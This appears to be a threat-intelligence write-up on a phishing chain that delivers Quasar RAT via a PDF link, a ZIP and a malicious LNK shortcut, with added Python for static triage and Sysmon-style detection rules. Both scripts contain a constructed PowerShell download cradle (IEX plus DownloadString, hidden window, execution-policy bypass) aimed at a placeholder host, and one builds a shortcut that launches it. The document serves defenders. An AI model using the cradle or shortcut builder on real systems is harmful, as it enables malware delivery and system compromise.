Quasar RAT Delivery via Malicious PDF and LNK Files
- [01] Threat actors use PDFs with embedded links to deliver Quasar RAT via shortcut files, leading to full system compromise and data theft.
- [02] Affected systems include all Windows-based environments where users can open untrusted PDF attachments and run shortcut files downloaded from the internet.
- [03] Defenders should block execution of LNK files that originated in the internet zone and monitor endpoints for suspicious PowerShell launches, in particular encoded, hidden-window command lines started from user-writable directories.
A recent surge in phishing campaigns highlights a shift toward multi-stage delivery mechanisms designed to bypass traditional email gateways. According to SANS ISC, security researchers have identified an infection chain that combines a PDF document and an LNK (shortcut) file to deploy the Quasar RAT on target systems. The technique relies on social engineering rather than a specific CVE exploit: no stage needs a vulnerable reader or a missing patch, which makes it effective against organizations with permissive attachment policies.
Analysis of Malicious PDF and LNK Infection Chains
The attack begins with a PDF document that contains an embedded URI action. Unlike older PDF-based attacks that attempted to trigger an RCE through vulnerability exploitation in the PDF viewer, this campaign uses the document as a mere container for a malicious link. When the user clicks the link within the PDF, they are directed to download a ZIP archive containing a heavily obfuscated .lnk file.
When the user runs the .lnk file, it uses a living-off-the-land (LotL) technique, typically invoking PowerShell or the Windows Command Processor to reach out to an external server. This stage is the one defenders can inspect most cheaply: the shortcut's target path and command-line arguments are stored in clear in the LNK structure, so the download location can be recovered without detonating anything. The PowerShell command launched by the shortcut is often passed through the -EncodedCommand switch, which takes the script as Base64-encoded UTF-16LE text, and it is designed to download the final stage of the malware, the Quasar RAT, from a remote host.
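The two artifacts in this chain can be triaged statically. The following is an added example written for this page, not code from the SANS ISC write-up or from any analysis tool: it scans a PDF for URI actions, then walks the Shell Link (MS-SHLLINK) structure of a shortcut to read its target and arguments and decodes the Base64/UTF-16LE script behind -EncodedCommand. Both the PDF and the LNK are constructed inside the script (the `example.invalid` URLs and the `Invoice.zip` name are placeholders, not indicators from the campaign).

```python
"""Added example (not code from the SANS ISC write-up): pull the link out of a
PDF lure and recover the PowerShell command hidden in a Windows shortcut.
The PDF and the LNK below are constructed in-script; no real samples are used."""
import base64
import re
import struct
import uuid

# --- Stage 1: a PDF that carries nothing but a URI action (constructed) ------
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Annot /Subtype /Link /Rect [100 600 300 620] "
    b"/A << /S /URI /URI (https://example.invalid/download/Invoice.zip) >> >> endobj\n"
    b"%%EOF\n"
)
URI_RE = re.compile(rb"/URI\s*\((?P<uri>(?:\\.|[^)\\])*)\)")

def extract_pdf_uris(pdf):
    """Every /URI action target found in the raw bytes. Caveat: real lures may
    keep the annotation inside a FlateDecode stream; inflate streams first."""
    return [m.group("uri").decode("latin-1") for m in URI_RE.finditer(pdf)]

# --- Stage 2: the shortcut inside the ZIP (layout per MS-SHLLINK) -------------
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON, IS_UNICODE = 0x08, 0x10, 0x20, 0x40, 0x80
LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046").bytes_le

def _string_data(s):
    # StringData entry: CountCharacters (uint16) + UTF-16LE chars, no terminator
    return struct.pack("<H", len(s)) + s.encode("utf-16-le")

def build_lnk(target, args):
    """Minimal shortcut with only the fields this chain abuses populated."""
    header = struct.pack("<I", 0x4C) + LNK_CLSID
    header += struct.pack("<II", HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE, 0)
    header += b"\x00" * 24                                  # three zero FILETIMEs
    header += struct.pack("<IIIHHII", 0, 0, 7, 0, 0, 0, 0)  # size, icon, SW_SHOWMINNOACTIVE, hotkey, reserved
    return header + _string_data(target) + _string_data(args)

def parse_lnk(blob):
    """Walk the header, skip the optional ID list and LinkInfo, read StringData."""
    if blob[:4] != b"\x4c\x00\x00\x00" or blob[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", blob, 20)[0]
    pos = 0x4C
    if flags & HAS_ID_LIST:
        pos += 2 + struct.unpack_from("<H", blob, pos)[0]
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from("<I", blob, pos)[0]
    fields = {}
    for bit, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON, "icon_location")):
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", blob, pos)[0]
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = blob[pos:pos + count * width]
        fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
        pos += count * width
    return fields

# PowerShell -EncodedCommand (and its prefixes -e/-ec/-enc) takes Base64 of UTF-16LE text
ENC_RE = re.compile(r"-e(?:ncodedcommand|nco|nc|n|c)?\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(arguments):
    m = ENC_RE.search(arguments or "")
    return base64.b64decode(m.group(1)).decode("utf-16-le") if m else None

def analyze_chain(pdf, lnk):
    """What an analyst wants from the two artifacts before detonating anything."""
    fields = parse_lnk(lnk)
    return {
        "pdf_uris": extract_pdf_uris(pdf),
        "lnk_target": fields.get("relative_path"),
        "lnk_arguments": fields.get("arguments"),
        "decoded_script": decode_encoded_command(fields.get("arguments")),
    }

# Constructed second stage: a download cradle pointing at a reserved test name.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/q.ps1')"
SAMPLE_LNK = build_lnk(
    "..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "-nop -w hidden -ep bypass -enc " + base64.b64encode(STAGE2.encode("utf-16-le")).decode(),
)

if __name__ == "__main__":
    for key, value in analyze_chain(SAMPLE_PDF, SAMPLE_LNK).items():
        print(f"{key}: {value}")
```

`parse_lnk` deliberately skips the LinkTargetIDList and LinkInfo blocks by their size fields rather than interpreting them; for a triage of this chain the StringData section (target, arguments) is what matters, and the same walk works on a real sample read from disk. Relative targets such as the `..\..\Windows\...` path above are common in malicious shortcuts because they resolve regardless of the drive letter.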
Quasar RAT C2 Infrastructure and Capabilities
Quasar RAT is an open-source Remote Access Trojan that provides attackers with comprehensive control over a compromised host. Once the malware is executed, it establishes a connection to the C2 server to receive further instructions. The Quasar RAT C2 infrastructure often utilizes dynamic DNS services or compromised legitimate websites to mask its presence.
The capabilities of Quasar RAT include:
- Remote shell access and command execution.
- Keylogging and credential harvesting from web browsers.
- File system manipulation (uploading/downloading files).
- Remote desktop viewing and control.
- Registry editing to ensure persistence.
Because the malware's C2 channel is encrypted, payload inspection yields little; SIEM and SOC analysts should instead hunt on connection metadata, such as outbound sessions on ports no sanctioned application uses, beacon-like connection timing from a binary in a user-writable directory, or connections to known malicious or dynamic DNS domains. Once persistence is established, the threat actor may attempt lateral movement to identify and exfiltrate sensitive data within the corporate network.
Quasar RAT Detection Techniques and Mitigation
Detecting this infection chain requires a layered defense strategy. Traditional antivirus often fails to flag the initial PDF lure because it contains no exploit or embedded executable, only a link. Organizations should therefore prioritize EDR telemetry that ties the stages together: the PDF reader handing a URL to the browser, the ZIP download, and the PowerShell or cmd.exe launch that follows when the extracted shortcut is opened. In that last step the parent process is usually explorer.exe rather than the PDF reader, so the strongest signals are the encoded or hidden-window command line and a working directory under Downloads or Temp.
Effective Quasar RAT detection techniques involve monitoring for the following MITRE ATT&CK techniques:
- T1204.001 (User Execution: Malicious Link): Training users to recognize suspicious URIs inside PDFs.
- T1204.002 (User Execution: Malicious File): Blocking the execution of LNK files downloaded from the internet, and making sure the archive tool in use preserves the Mark of the Web on extracted files so zone-based controls still apply to the shortcut.
- T1059.001 (Command and Scripting Interpreter: PowerShell): Enabling script block logging (Event ID 4104), which records the decoded script even when the command line shows only Base64, and Constrained Language Mode for standard users.
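The process-level signals above and the network-level hunting described in the C2 section can be expressed as a small rule set. The following is an added example written for this page, not code from the SANS ISC write-up or from any EDR product: it runs rules over Sysmon-style process-creation and network-connection records (the field names `Image`, `ParentImage`, `CommandLine`, `CurrentDirectory`, `DestinationHostname`, `DestinationPort` follow Sysmon's naming) and reports which event tripped which rule. All events, hostnames, paths and the "known C2" list are constructed for the demo.

```python
"""Added example (not code from the SANS ISC write-up): detection rules for the
process and network behaviour of the PDF -> LNK -> PowerShell -> Quasar chain,
run over Sysmon-style event records. All events and domains are constructed."""
import base64
import re

PDF_READERS = {"acrord32.exe", "acrobat.exe", "foxitreader.exe", "foxitpdfreader.exe", "sumatrapdf.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
WEB_PORTS = {80, 443}
EXTRACTION_DIRS = ("\\downloads\\", "\\temp\\", "\\tmp\\")   # where ZIP contents usually land
KNOWN_C2_DOMAINS = {"update-srv.example.invalid"}             # constructed threat-intel entry
ENC_RE = re.compile(r"-e(?:ncodedcommand|nco|nc|n|c)?\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_RE = re.compile(r"-(?:w|win|windowstyle)\s+hidden|-nop\b|-noprofile\b|-(?:ep|executionpolicy)\s+bypass", re.I)
CRADLE_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bIEX\b|Invoke-Expression|Net\.WebClient|Start-BitsTransfer", re.I)

def _exe(path):
    # "C:\Windows\System32\cmd.exe" -> "cmd.exe"
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def decoded_command(cmdline):
    """Recover the script behind -EncodedCommand (Base64 of UTF-16LE), or ''."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""

def check_process(ev):
    """Rule names tripped by one process-creation event (T1204.002, T1059.001)."""
    image, parent = _exe(ev["Image"]), _exe(ev["ParentImage"])
    cmd, cwd = ev.get("CommandLine", ""), ev.get("CurrentDirectory", "").lower()
    hits = []
    if image in SCRIPT_HOSTS and parent in PDF_READERS:
        hits.append("pdf_reader_spawned_script_host")
    if image in SCRIPT_HOSTS and parent == "explorer.exe" and any(d in cwd for d in EXTRACTION_DIRS):
        hits.append("script_host_from_extraction_dir")      # a double-clicked LNK looks like this
    if image in POWERSHELL:
        script = decoded_command(cmd)
        if script and HIDDEN_RE.search(cmd):
            hits.append("encoded_hidden_powershell")
        if CRADLE_RE.search(cmd) or CRADLE_RE.search(script):
            hits.append("download_cradle")
    return hits

def check_network(ev):
    """Rule names tripped by one outbound-connection event (C2 hunting)."""
    image, port = _exe(ev["Image"]), int(ev["DestinationPort"])
    hits = []
    if image not in BROWSERS and port not in WEB_PORTS:
        hits.append("non_standard_port_egress")
    if ev.get("DestinationHostname", "").lower() in KNOWN_C2_DOMAINS:
        hits.append("known_c2_domain")
    return hits

def triage(events):
    """Return (ProcessId, Image, hits) for every event that trips at least one rule."""
    findings = []
    for ev in events:
        hits = check_process(ev) if ev["EventType"] == "process" else check_network(ev)
        if hits:
            findings.append((ev["ProcessId"], ev["Image"], hits))
    return findings

# Constructed events reproducing the chain as Sysmon would record it.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('https://cdn.example.invalid/q.ps1')"
ENC = base64.b64encode(STAGE2.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    # Acrobat hands the embedded link to the default browser: benign on its own
    {"EventType": "process", "ProcessId": 4100, "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "ParentImage": "C:\\Program Files\\Adobe\\Acrobat Reader\\AcroRd32.exe",
     "CommandLine": "chrome.exe https://example.invalid/download/Invoice.zip", "CurrentDirectory": "C:\\Users\\jdoe\\"},
    # the extracted shortcut is double-clicked: hidden, encoded PowerShell under explorer.exe
    {"EventType": "process", "ProcessId": 4212, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell.exe -nop -w hidden -ep bypass -enc " + ENC,
     "CurrentDirectory": "C:\\Users\\jdoe\\Downloads\\Invoice\\"},
    # the browser fetching the ZIP over HTTPS: should stay quiet
    {"EventType": "network", "ProcessId": 4100, "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "DestinationHostname": "example.invalid", "DestinationPort": 443},
    # the dropped RAT beaconing to a dynamic-DNS style host on an unusual port (constructed path and port)
    {"EventType": "network", "ProcessId": 5020, "Image": "C:\\Users\\jdoe\\AppData\\Roaming\\SubDir\\Client.exe",
     "DestinationHostname": "update-srv.example.invalid", "DestinationPort": 4782},
]

if __name__ == "__main__":
    for pid, image, hits in triage(SAMPLE_EVENTS):
        print(f"pid={pid} {image}: {', '.join(hits)}")
```

The benign browser launch from the PDF reader and the HTTPS fetch produce no findings, which is the point of keying on script hosts and on non-web ports rather than on "anything the reader spawns"; the PowerShell event trips three rules at once, and a SIEM correlation that requires two or more of them within a short window keeps the false-positive rate from encoded but legitimate administrative scripts low. In production the decoded-script check belongs on script block log events (4104) as well, since the command line alone can be obfuscated further.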
To mitigate this threat, administrators should consider implementing a Zero Trust architecture where no file is implicitly trusted based on its origin. Restricting the ability of standard users to execute scripts or download executable content from the web remains the most effective defense against this evolving malware delivery method.